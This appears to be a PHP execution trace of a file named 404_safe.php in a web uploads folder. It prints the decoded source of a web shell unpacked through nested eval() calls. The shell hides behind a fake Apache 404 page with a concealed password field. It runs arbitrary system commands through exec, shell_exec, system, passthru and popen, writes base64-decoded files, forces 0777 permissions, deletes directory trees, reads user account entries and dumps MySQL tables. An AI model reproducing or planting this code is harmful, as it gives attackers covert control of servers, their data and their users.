{\n\t\t\tfor($i=10;$i<=23;$i++) {\n\t\t\t\tp(\'<li><u>\'.$info[$i][0].\':</u>\'.$info[$i][1].\'</li>\');\n\t\t\t}\n\t\t}\n\t\tp(\'</ul>\');\n\t}\n}//end phpenv\n\nelse {\n\tm(\'Undefined Action\');\n}\n\n?>\n</td></tr></table>\n<div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">\n\t<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>\n\t<B>The Legend of Vietnamese Hacker World</B> All Rights Reserved.\n</div>\n</body>\n</html>\n\n<?php\n\n/*======================================================\nShow info shell\n======================================================*/\n\nfunction m($msg) {\n\techo \'<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">\';\n\techo $msg;\n\techo \'</div>\';\n}\nfunction scookie($key, $value, $life = 0, $prefix = 1) {\n\tglobal $admin, $timestamp, $_SERVER;\n\t$key = ($prefix ? $admin[\'cookiepre\'] : \'\').$key;\n\t$life = $life ? $life : $admin[\'cookielife\'];\n\t$useport = $_SERVER[\'SERVER_PORT\'] == 443 ? 1 : 0;\n\tsetcookie($key, $value, $timestamp+$life, $admin[\'cookiepath\'], $admin[\'cookiedomain\'], $useport);\n}\nfunction multi($num, $perpage, $curpage, $tablename) {\n\t$multipage = \'\';\n\tif($num > $perpage) {\n\t\t$page = 10;\n\t\t$offset = 5;\n\t\t$pages = @ceil($num / $perpage);\n\t\tif($page > $pages) {\n\t\t\t$from = 1;\n\t\t\t$to = $pages;\n\t\t} else {\n\t\t\t$from = $curpage - $offset;\n\t\t\t$to = $curpage + $page - $offset - 1;\n\t\t\tif($from < 1) {\n\t\t\t\t$to = $curpage + 1 - $from;\n\t\t\t\t$from = 1;\n\t\t\t\tif(($to - $from) < $page && ($to - $from) < $pages) {\n\t\t\t\t\t$to = $page;\n\t\t\t\t}\n\t\t\t} elseif($to > $pages) {\n\t\t\t\t$from = $curpage - $pages + $to;\n\t\t\t\t$to = $pages;\n\t\t\t\tif(($to - $from) < $page && ($to - $from) < $pages) {\n\t\t\t\t\t$from = $pages - $page + 1;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t$multipage = ($curpage - $offset > 1 && $pages > $page ? \'<a href="javascript:settable(\\\'\'.$tablename.\'\\\', \\\'\\\', 1);">First</a> \' : \'\').($curpage > 1 ? \'<a href="javascript:settable(\\\'\'.$tablename.\'\\\', \\\'\\\', \'.($curpage - 1).\');">Prev</a> \' : \'\');\n\t\tfor($i = $from; $i <= $to; $i++) {\n\t\t\t$multipage .= $i == $curpage ? $i.\' \' : \'<a href="javascript:settable(\\\'\'.$tablename.\'\\\', \\\'\\\', \'.$i.\');">[\'.$i.\']</a> \';\n\t\t}\n\t\t$multipage .= ($curpage < $pages ? \'<a href="javascript:settable(\\\'\'.$tablename.\'\\\', \\\'\\\', \'.($curpage + 1).\');">Next</a>\' : \'\').($to < $pages ? \' <a href="javascript:settable(\\\'\'.$tablename.\'\\\', \\\'\\\', \'.$pages.\');">Last</a>\' : \'\');\n\t\t$multipage = $multipage ? \'<p>Pages: \'.$multipage.\'</p>\' : \'\';\n\t}\n\treturn $multipage;\n}\n// Login page\nfunction loginpage() {\n?>\n\n<html> <title>404 Not Found</title> <h1>Not Found</h1>  <p>The requested URL / was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr>  <address>Apache Server at  Port 80</address>      <style>          input { margin:0;background-color:#fff;border:1px solid #fff; }      </style>  <center> <form method="POST" action="">     <span style="font:10pt tahoma;"></span><input name="password" type="password" size="20">     <input type="hidden" name="doing" value="login">     </form> </center> \t</html> \n<?php\n\texit;\n\n}//end loginpage()\n\nfunction execute($cfe) {\n\t$res = \'\';\n\tif ($cfe) {\n\t\tif(function_exists(\'exec\')) {\n\t\t\t@exec($cfe,$res);\n\t\t\t$res = join("\\n",$res);\n\t\t} elseif(function_exists(\'shell_exec\')) {\n\t\t\t$res = @shell_exec($cfe);\n\t\t} elseif(function_exists(\'system\')) {\n\t\t\t@ob_start();\n\t\t\t@system($cfe);\n\t\t\t$res = @ob_get_contents();\n\t\t\t@ob_end_clean();\n\t\t} elseif(function_exists(\'passthru\')) {\n\t\t\t@ob_start();\n\t\t\t@passthru($cfe);\n\t\t\t$res = @ob_get_contents();\n\t\t\t@ob_end_clean();\n\t\t} elseif(@is_resource($f = @popen($cfe,"r"))) {\n\t\t\t$res = \'\';\n\t\t\twhile(!@feof($f)) {\n\t\t\t\t$res .= @fread($f,1024);\n\t\t\t}\n\t\t\t@pclose($f);\n\t\t}\n\t}\n\treturn $res;\n}\nfunction which($pr) {\n\t$path = execute("which $pr");\n\treturn ($path ? $path : $pr);\n}\n\nfunction cf($fname,$text){\n\tif($fp=@fopen($fname,\'w\')) {\n\t\t@fputs($fp,@base64_decode($text));\n\t\t@fclose($fp);\n\t}\n}\n\n// Debug\nfunction debuginfo() {\n\tglobal $starttime;\n\t$mtime = explode(\' \', microtime());\n\t$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);\n\techo \'Processed in \'.$totaltime.\' second(s)\';\n}\n\n// Function connect database\nfunction dbconn($dbhost,$dbuser,$dbpass,$dbname=\'\',$charset=\'\',$dbport=\'3306\') {\n\tif(!$link = @mysql_connect($dbhost.\':\'.$dbport, $dbuser, $dbpass)) {\n\t\tp(\'<h2>Can not connect to MySQL server</h2>\');\n\t\texit;\n\t}\n\tif($link && $dbname) {\n\t\tif (!@mysql_select_db($dbname, $link)) {\n\t\t\tp(\'<h2>Database selected has error</h2>\');\n\t\t\texit;\n\t\t}\n\t}\n\tif($link && mysql_get_server_info() > \'4.1\') {\n\t\tif(in_array(strtolower($charset), array(\'gbk\', \'big5\', \'utf8\'))) {\n\t\t\tq("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);\n\t\t}\n\t}\n\treturn $link;\n}\n\n// Array strip\nfunction s_array(&$array) {\n\tif (is_array($array)) {\n\t\tforeach ($array as $k => $v) {\n\t\t\t$array[$k] = s_array($v);\n\t\t}\n\t} else if (is_string($array)) {\n\t\t$array = stripslashes($array);\n\t}\n\treturn $array;\n}\n\n// HTML Strip\nfunction html_clean($content) {\n\t$content = htmlspecialchars($content);\n\t$content = str_replace("\\n", "<br />", $content);\n\t$content = str_replace("  ", "&nbsp;&nbsp;", $content);\n\t$content = str_replace("\\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);\n\treturn $content;\n}\n\n// Chmod\nfunction getChmod($filepath){\n\treturn substr(base_convert(@fileperms($filepath),10,8),-4);\n}\n\nfunction getPerms($filepath) {\n\t$mode = @fileperms($filepath);\n\tif (($mode & 0xC000) === 0xC000) {$type = \'s\';}\n\telseif (($mode & 0x4000) === 0x4000) {$type = \'d\';}\n\telseif (($mode & 0xA000) === 0xA000) {$type = \'l\';}\n\telseif (($mode & 0x8000) === 0x8000) {$type = \'-\';}\n\telseif (($mode & 0x6000) === 0x6000) {$type = \'b\';}\n\telseif (($mode & 0x2000) === 0x2000) {$type = \'c\';}\n\telseif (($mode & 0x1000) === 0x1000) {$type = \'p\';}\n\telse {$type = \'?\';}\n\n\t$owner[\'read\'] = ($mode & 00400) ? \'r\' : \'-\';\n\t$owner[\'write\'] = ($mode & 00200) ? \'w\' : \'-\';\n\t$owner[\'execute\'] = ($mode & 00100) ? \'x\' : \'-\';\n\t$group[\'read\'] = ($mode & 00040) ? \'r\' : \'-\';\n\t$group[\'write\'] = ($mode & 00020) ? \'w\' : \'-\';\n\t$group[\'execute\'] = ($mode & 00010) ? \'x\' : \'-\';\n\t$world[\'read\'] = ($mode & 00004) ? \'r\' : \'-\';\n\t$world[\'write\'] = ($mode & 00002) ? \'w\' : \'-\';\n\t$world[\'execute\'] = ($mode & 00001) ? \'x\' : \'-\';\n\n\tif( $mode & 0x800 ) {$owner[\'execute\'] = ($owner[\'execute\']==\'x\') ? \'s\' : \'S\';}\n\tif( $mode & 0x400 ) {$group[\'execute\'] = ($group[\'execute\']==\'x\') ? \'s\' : \'S\';}\n\tif( $mode & 0x200 ) {$world[\'execute\'] = ($world[\'execute\']==\'x\') ? \'t\' : \'T\';}\n\n\treturn $type.$owner[\'read\'].$owner[\'write\'].$owner[\'execute\'].$group[\'read\'].$group[\'write\'].$group[\'execute\'].$world[\'read\'].$world[\'write\'].$world[\'execute\'];\n}\n\nfunction getUser($filepath)\t{\n\tif (function_exists(\'posix_getpwuid\')) {\n\t\t$array = @posix_getpwuid(@fileowner($filepath));\n\t\tif ($array && is_array($array)) {\n\t\t\treturn \' / <a href="#" title="User: \'.$array[\'name\'].\'&#13&#10Passwd: \'.$array[\'passwd\'].\'&#13&#10Uid: \'.$array[\'uid\'].\'&#13&#10gid: \'.$array[\'gid\'].\'&#13&#10Gecos: \'.$array[\'gecos\'].\'&#13&#10Dir: \'.$array[\'dir\'].\'&#13&#10Shell: \'.$array[\'shell\'].\'">\'.$array[\'name\'].\'</a>\';\n\t\t}\n\t}\n\treturn \'\';\n}\n\n// Delete dir\nfunction deltree($deldir) {\n\t$mydir=@dir($deldir);\n\twhile($file=$mydir->read())\t{\n\t\tif((is_dir($deldir.\'/\'.$file)) && ($file!=\'.\') && ($file!=\'..\')) {\n\t\t\t@chmod($deldir.\'/\'.$file,0777);\n\t\t\tdeltree($deldir.\'/\'.$file);\n\t\t}\n\t\tif (is_file($deldir.\'/\'.$file)) {\n\t\t\t@chmod($deldir.\'/\'.$file,0777);\n\t\t\t@unlink($deldir.\'/\'.$file);\n\t\t}\n\t}\n\t$mydir->close();\n\t@chmod($deldir,0777);\n\treturn @rmdir($deldir) ? 1 : 0;\n}\n\n// Background\nfunction bg() {\n\tglobal $bgc;\n\treturn ($bgc++%2==0) ? \'alt1\' : \'alt2\';\n}\n\n// Get path\nfunction getPath($scriptpath, $nowpath) {\n\tif ($nowpath == \'.\') {\n\t\t$nowpath = $scriptpath;\n\t}\n\t$nowpath = str_replace(\'\\\\\', \'/\', $nowpath);\n\t$nowpath = str_replace(\'//\', \'/\', $nowpath);\n\tif (substr($nowpath, -1) != \'/\') {\n\t\t$nowpath = $nowpath.\'/\';\n\t}\n\treturn $nowpath;\n}\n\n// Get up path\nfunction getUpPath($nowpath) {\n\t$pathdb = explode(\'/\', $nowpath);\n\t$num = count($pathdb);\n\tif ($num > 2) {\n\t\tunset($pathdb[$num-1],$pathdb[$num-2]);\n\t}\n\t$uppath = implode(\'/\', $pathdb).\'/\';\n\t$uppath = str_replace(\'//\', \'/\', $uppath);\n\treturn $uppath;\n}\n\n// Config\nfunction getcfg($varname) {\n\t$result = get_cfg_var($varname);\n\tif ($result == 0) {\n\t\treturn \'No\';\n\t} elseif ($result == 1) {\n\t\treturn \'Yes\';\n\t} else {\n\t\treturn $result;\n\t}\n}\n\n// Function name\nfunction getfun($funName) {\n\treturn (false !== function_exists($funName)) ? \'Yes\' : \'No\';\n}\n\nfunction GetList($dir){\n\tglobal $dirdata,$j,$nowpath;\n\t!$j && $j=1;\n\tif ($dh = opendir($dir)) {\n\t\twhile ($file = readdir($dh)) {\n\t\t\t$f=str_replace(\'//\',\'/\',$dir.\'/\'.$file);\n\t\t\tif($file!=\'.\' && $file!=\'..\' && is_dir($f)){\n\t\t\t\tif (is_writable($f)) {\n\t\t\t\t\t$dirdata[$j][\'filename\']=str_replace($nowpath,\'\',$f);\n\t\t\t\t\t$dirdata[$j][\'mtime\']=@date(\'Y-m-d H:i:s\',filemtime($f));\n\t\t\t\t\t$dirdata[$j][\'dirchmod\']=getChmod($f);\n\t\t\t\t\t$dirdata[$j][\'dirperm\']=getPerms($f);\n\t\t\t\t\t$dirdata[$j][\'dirlink\']=ue($dir);\n\t\t\t\t\t$dirdata[$j][\'server_link\']=$f;\n\t\t\t\t\t$dirdata[$j][\'client_link\']=ue($f);\n\t\t\t\t\t$j++;\n\t\t\t\t}\n\t\t\t\tGetList($f);\n\t\t\t}\n\t\t}\n\t\tclosedir($dh);\n\t\tclearstatcache();\n\t\treturn $dirdata;\n\t} else {\n\t\treturn array();\n\t}\n}\n\nfunction qy($sql) {\n\t//echo $sql.\'<br>\';\n\t$res = $error = \'\';\n\tif(!$res = @mysql_query($sql)) {\n\t\treturn 0;\n\t} else if(is_resource($res)) {\n\t\treturn 1;\n\t} else {\n\t\treturn 2;\n\t}\n\treturn 0;\n}\n\nfunction q($sql) {\n\treturn @mysql_query($sql);\n}\n\nfunction fr($qy){\n\tmysql_free_result($qy);\n}\n\nfunction sizecount($size) {\n\tif($size > 1073741824) {\n\t\t$size = round($size / 1073741824 * 100) / 100 . \' G\';\n\t} elseif($size > 1048576) {\n\t\t$size = round($size / 1048576 * 100) / 100 . \' M\';\n\t} elseif($size > 1024) {\n\t\t$size = round($size / 1024 * 100) / 100 . \' K\';\n\t} else {\n\t\t$size = $size . \' B\';\n\t}\n\treturn $size;\n}\n\n// Zip\nclass PHPZip{\n\tvar $out=\'\';\n\tfunction PHPZip($dir)\t{\n\t\tif (@function_exists(\'gzcompress\'))\t{\n\t\t\t$curdir = getcwd();\n\t\t\tif (is_array($dir)) $filelist = $dir;\n\t\t\telse{\n\t\t\t\t$filelist=$this -> GetFileList($dir);//File list\n\t\t\t\tforeach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);\n\t\t\t}\n\t\t\tif ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);\n\t\t\telse chdir($curdir);\n\t\t\tif (count($filelist)>0){\n\t\t\t\tforeach($filelist as $filename){\n\t\t\t\t\tif (is_file($filename)){\n\t\t\t\t\t\t$fd = fopen ($filename, \'r\');\n\t\t\t\t\t\t$content = @fread ($fd, filesize($filename));\n\t\t\t\t\t\tfclose ($fd);\n\t\t\t\t\t\tif (is_array($dir)) $filename = basename($filename);\n\t\t\t\t\t\t$this -> addFile($content, $filename);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t$this->out = $this -> file();\n\t\t\t\tchdir($curdir);\n\t\t\t}\n\t\t\treturn 1;\n\t\t}\n\t\telse return 0;\n\t}\n\n\t// Show file list\n\tfunction GetFileList($dir){\n\t\tstatic $a;\n\t\tif (is_dir($dir)) {\n\t\t\tif ($dh = opendir($dir)) {\n\t\t\t\twhile ($file = readdir($dh)) {\n\t\t\t\t\tif($file!=\'.\' && $file!=\'..\'){\n\t\t\t\t\t\t$f=$dir .\'/\'. $file;\n\t\t\t\t\t\tif(is_dir($f)) $this->GetFileList($f);\n\t\t\t\t\t\t$a[]=$f;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tclosedir($dh);\n\t\t\t}\n\t\t}\n\t\treturn $a;\n\t}\n\n\tvar $datasec      = array();\n\tvar $ctrl_dir     = array();\n\tvar $eof_ctrl_dir = "\\x50\\x4b\\x05\\x06\\x00\\x00\\x00\\x00";\n\tvar $old_offset   = 0;\n\n\tfunction unix2DosTime($unixtime = 0) {\n\t\t$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);\n\t\tif ($timearray[\'year\'] < 1980) {\n\t\t\t$timearray[\'year\']    = 1980;\n\t\t\t$timearray[\'mon\']     = 1;\n\t\t\t$timearray[\'mday\']    = 1;\n\t\t\t$timearray[\'hours\']   = 0;\n\t\t\t$timearray[\'minutes\'] = 0;\n\t\t\t$timearray[\'seconds\'] = 0;\n\t\t} // end if\n\t\treturn (($timearray[\'year\'] - 1980) << 25) | ($timearray[\'mon\'] << 21) | ($timearray[\'mday\'] << 16) |\n\t\t\t\t($timearray[\'hours\'] << 11) | ($timearray[\'minutes\'] << 5) | ($timearray[\'seconds\'] >> 1);\n\t}\n\n\tfunction addFile($data, $name, $time = 0) {\n\t\t$name = str_replace(\'\\\\\', \'/\', $name);\n\n\t\t$dtime = dechex($this->unix2DosTime($time));\n\t\t$hexdtime\t= \'\\x\' . $dtime[6] . $dtime[7]\n\t\t\t\t\t. \'\\x\' . $dtime[4] . $dtime[5]\n\t\t\t\t\t. \'\\x\' . $dtime[2] . $dtime[3]\n\t\t\t\t\t. \'\\x\' . $dtime[0] . $dtime[1];\n\t\teval(\'$hexdtime = "\' . $hexdtime . \'";\');\n\t\t$fr\t= "\\x50\\x4b\\x03\\x04";\n\t\t$fr\t.= "\\x14\\x00";\n\t\t$fr\t.= "\\x00\\x00";\n\t\t$fr\t.= "\\x08\\x00";\n\t\t$fr\t.= $hexdtime;\n\n\t\t$unc_len = strlen($data);\n\t\t$crc = crc32($data);\n\t\t$zdata = gzcompress($data);\n\t\t$c_len = strlen($zdata);\n\t\t$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);\n\t\t$fr .= pack(\'V\', $crc);\n\t\t$fr .= pack(\'V\', $c_len);\n\t\t$fr .= pack(\'V\', $unc_len);\n\t\t$fr .= pack(\'v\', strlen($name));\n\t\t$fr .= pack(\'v\', 0);\n\t\t$fr .= $name;\n\t\t$fr .= $zdata;\n\t\t$fr .= pack(\'V\', $crc);\n\t\t$fr .= pack(\'V\', $c_len);\n\t\t$fr .= pack(\'V\', $unc_len);\n\n\t\t$this -> datasec[] = $fr;\n\t\t$new_offset = strlen(implode(\'\', $this->datasec));\n\n\t\t$cdrec = "\\x50\\x4b\\x01\\x02";\n\t\t$cdrec .= "\\x00\\x00";\n\t\t$cdrec .= "\\x14\\x00";\n\t\t$cdrec .= "\\x00\\x00";\n\t\t$cdrec .= "\\x08\\x00";\n\t\t$cdrec .= $hexdtime;\n\t\t$cdrec .= pack(\'V\', $crc);\n\t\t$cdrec .= pack(\'V\', $c_len);\n\t\t$cdrec .= pack(\'V\', $unc_len);\n\t\t$cdrec .= pack(\'v\', strlen($name) );\n\t\t$cdrec .= pack(\'v\', 0 );\n\t\t$cdrec .= pack(\'v\', 0 );\n\t\t$cdrec .= pack(\'v\', 0 );\n\t\t$cdrec .= pack(\'v\', 0 );\n\t\t$cdrec .= pack(\'V\', 32 );\n\t\t$cdrec .= pack(\'V\', $this -> old_offset );\n\t\t$this -> old_offset = $new_offset;\n\t\t$cdrec .= $name;\n\n\t\t$this -> ctrl_dir[] = $cdrec;\n\t}\n\n\tfunction file() {\n\t\t$data    = implode(\'\', $this -> datasec);\n\t\t$ctrldir = implode(\'\', $this -> ctrl_dir);\n\t\treturn $data . $ctrldir . $this -> eof_ctrl_dir . pack(\'v\', sizeof($this -> ctrl_dir)) . pack(\'v\', sizeof($this -> ctrl_dir)) .\tpack(\'V\', strlen($ctrldir)) . pack(\'V\', strlen($data)) . "\\x00\\x00";\n\t}\n}\n\n// Dump mysql\nfunction sqldumptable($table, $fp=0) {\n\t$tabledump = "DROP TABLE IF EXISTS $table;\\n";\n\t$tabledump .= "CREATE TABLE $table (\\n";\n\n\t$firstfield=1;\n\n\t$fields = q("SHOW FIELDS FROM $table");\n\twhile ($field = mysql_fetch_array($fields)) {\n\t\tif (!$firstfield) {\n\t\t\t$tabledump .= ",\\n";\n\t\t} else {\n\t\t\t$firstfield=0;\n\t\t}\n\t\t$tabledump .= "   $field[Field] $field[Type]";\n\t\tif (!empty($field["Default"])) {\n\t\t\t$tabledump .= " DEFAULT \'$field[Default]\'";\n\t\t}\n\t\tif ($field[\'Null\'] != "YES") {\n\t\t\t$tabledump .= " NOT NULL";\n\t\t}\n\t\tif ($field[\'Extra\'] != "") {\n\t\t\t$tabledump .= " $field[Extra]";\n\t\t}\n\t}\n\tfr($fields);\n\n\t$keys = q("SHOW KEYS FROM $table");\n\twhile ($key = mysql_fetch_array($keys)) {\n\t\t$kname=$key[\'Key_name\'];\n\t\tif ($kname != "PRIMARY" && $key[\'Non_unique\'] == 0) {\n\t\t\t$kname="UNIQUE|$kname";\n\t\t}\n\t\tif(!is_array($index[$kname])) {\n\t\t\t$index[$kname] = array();\n\t\t}\n\t\t$index[$kname][] = $key[\'Column_name\'];\n\t}\n\tfr($keys);\n\n\twhile(list($kname, $columns) = @each($index)) {\n\t\t$tabledump .= ",\\n";\n\t\t$colnames=implode($columns,",");\n\n\t\tif ($kname == "PRIMARY") {\n\t\t\t$tabledump .= "   PRIMARY KEY ($colnames)";\n\t\t} else {\n\t\t\tif (substr($kname,0,6) == "UNIQUE") {\n\t\t\t\t$kname=substr($kname,7);\n\t\t\t}\n\t\t\t$tabledump .= "   KEY $kname ($colnames)";\n\t\t}\n\t}\n\n\t$tabledump .= "\\n);\\n\\n";\n\tif ($fp) {\n\t\tfwrite($fp,$tabledump);\n\t} else {\n\t\techo $tabledump;\n\t}\n\n\t$rows = q("SELECT * FROM $table");\n\t$numfields = mysql_num_fields($rows);\n\twhile ($row = mysql_fetch_array($rows)) {\n\t\t$tabledump = "INSERT INTO $table VALUES(";\n\n\t\t$fieldcounter=-1;\n\t\t$firstfield=1;\n\t\twhile (++$fieldcounter<$numfields) {\n\t\t\tif (!$firstfield) {\n\t\t\t\t$tabledump.=", ";\n\t\t\t} else {\n\t\t\t\t$firstfield=0;\n\t\t\t}\n\n\t\t\tif (!isset($row[$fieldcounter])) {\n\t\t\t\t$tabledump .= "NULL";\n\t\t\t} else {\n\t\t\t\t$tabledump .= "\'".mysql_escape_string($row[$fieldcounter])."\'";\n\t\t\t}\n\t\t}\n\n\t\t$tabledump .= ");\\n";\n\n\t\tif ($fp) {\n\t\t\tfwrite($fp,$tabledump);\n\t\t} else {\n\t\t\techo $tabledump;\n\t\t}\n\t}\n\tfr($rows);\n\tif ($fp) {\n\t\tfwrite($fp,"\\n");\n\t} else {\n\t\techo "\\n";\n\t}\n}\n\nfunction ue($str){\n\treturn urlencode($str);\n}\n\nfunction p($str){\n\techo $str."\\n";\n}\n\nfunction tbhead() {\n\tp(\'<table width="100%" border="0" cellpadding="4" cellspacing="0">\');\n}\nfunction tbfoot(){\n\tp(\'</table>\');\n}\n\nfunction makehide($name,$value=\'\'){\n\tp("<input id=\\"$name\\" type=\\"hidden\\" name=\\"$name\\" value=\\"$value\\" />");\n}\n\nfunction makeinput($arg = array()){\n\t$arg[\'size\'] = $arg[\'size\'] > 0 ? "size=\\"$arg[size]\\"" : "size=\\"100\\"";\n\t$arg[\'extra\'] = $arg[\'extra\'] ? $arg[\'extra\'] : \'\';\n\t!$arg[\'type\'] && $arg[\'type\'] = \'text\';\n\t$arg[\'title\'] = $arg[\'title\'] ? $arg[\'title\'].\'<br />\' : \'\';\n\t$arg[\'class\'] = $arg[\'class\'] ? $arg[\'class\'] : \'input\';\n\tif ($arg[\'newline\']) {\n\t\tp("<p>$arg[title]<input class=\\"$arg[class]\\" name=\\"$arg[name]\\" id=\\"$arg[name]\\" value=\\"$arg[value]\\" type=\\"$arg[type]\\" $arg[size] $arg[extra] /></p>");\n\t} else {\n\t\tp("$arg[title]<input class=\\"$arg[class]\\" name=\\"$arg[name]\\" id=\\"$arg[name]\\" value=\\"$arg[value]\\" type=\\"$arg[type]\\" $arg[size] $arg[extra] />");\n\t}\n}\n\nfunction makeselect($arg = array()){\n\tif ($arg[\'onchange\']) {\n\t\t$onchange = \'onchange="\'.$arg[\'onchange\'].\'"\';\n\t}\n\t$arg[\'title\'] = $arg[\'title\'] ? $arg[\'title\'] : \'\';\n\tif ($arg[\'newline\']) p(\'<p>\');\n\tp("$arg[title] <select class=\\"input\\" id=\\"$arg[name]\\" name=\\"$arg[name]\\" $onchange>");\n\t\tif (is_array($arg[\'option\'])) {\n\t\t\tforeach ($arg[\'option\'] as $key=>$value) {\n\t\t\t\tif ($arg[\'selected\']==$key) {\n\t\t\t\t\tp("<option value=\\"$key\\" selected>$value</option>");\n\t\t\t\t} else {\n\t\t\t\t\tp("<option value=\\"$key\\">$value</option>");\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\tp("</select>");\n\tif ($arg[\'newline\']) p(\'</p>\');\n}\nfunction formhead($arg = array()) {\n\t!$arg[\'method\'] && $arg[\'method\'] = \'post\';\n\t!$arg[\'action\'] && $arg[\'action\'] = $self;\n\t$arg[\'target\'] = $arg[\'target\'] ? "target=\\"$arg[target]\\"" : \'\';\n\t!$arg[\'name\'] && $arg[\'name\'] = \'form1\';\n\tp("<form name=\\"$arg[name]\\" id=\\"$arg[name]\\" action=\\"$arg[action]\\" method=\\"$arg[method]\\" $arg[target]>");\n\tif ($arg[\'title\']) {\n\t\tp(\'<h2>\'.$arg[\'title\'].\' &raquo;</h2>\');\n\t}\n}\n\nfunction maketext($arg = array()){\n\t!$arg[\'cols\'] && $arg[\'cols\'] = 100;\n\t!$arg[\'rows\'] && $arg[\'rows\'] = 25;\n\t$arg[\'title\'] = $arg[\'title\'] ? $arg[\'title\'].\'<br />\' : \'\';\n\tp("<p>$arg[title]<textarea class=\\"area\\" id=\\"$arg[name]\\" name=\\"$arg[name]\\" cols=\\"$arg[cols]\\" rows=\\"$arg[rows]\\" $arg[extra]>$arg[value]</textarea></p>");\n}\n\nfunction formfooter($name = \'\'){\n\t!$name && $name = \'submit\';\n\tp(\'<p><input class="bt" name="\'.$name.\'" id=\\"\'.$name.\'\\" type="submit" value="Submit"></p>\');\n\tp(\'</form>\');\n}\n\nfunction formfoot(){\n\tp(\'</form>\');\n}\n\n// Exit\nfunction pr($a) {\n\techo \'<pre>\';\n\tprint_r($a);\n\techo \'</pre>\';\n}'	/var/www/html/uploads/404_safe.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	0
6	23	0	0.011517	1548296	error_reporting	0		/var/www/html/uploads/404_safe.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	8	1	7
6	23	1	0.011539	1548336
6	23	R			22527
5	22	1	0.011567	1550576
4	18	1	0.011622	1161608
3	12	1	0.011631	1057696
2	6	1	0.011639	1054528
1	3	1	0.011647	1051208
1	24	0	0.011655	1051240	Error->__toString	0		Unknown	0	0
2	25	0	0.011668	1051320	Error->getTraceAsString	0		Unknown	0	0
2	25	1	0.011689	1055416
2	25	R			'#0 /var/www/html/uploads/404_safe.php(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/404_safe.php(1) : eval()\'d code(1) : eval()\'d code(1): eval()\n#2 /var/www/html/uploads/404_safe.php(1) : eval()\'d code(1): eval()\n#3 /var/www/html/uploads/404_safe.php(1): eval()\n#4 {main}'
1	24	1	0.011713	1055712
1	24	R			'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/404_safe.php(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code:9\nStack trace:\n#0 /var/www/html/uploads/404_safe.php(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/404_safe.php(1) : eval()\'d code(1) : eval()\'d code(1): eval()\n#2 /var/www/html/uploads/404_safe.php(1) : eval()\'d code(1): eval()\n#3 /var/www/html/uploads/404_safe.php(1): eval()\n#4 {main}'
			0.011800	976232
TRACE END   [2023-02-12 23:07:15.034440]

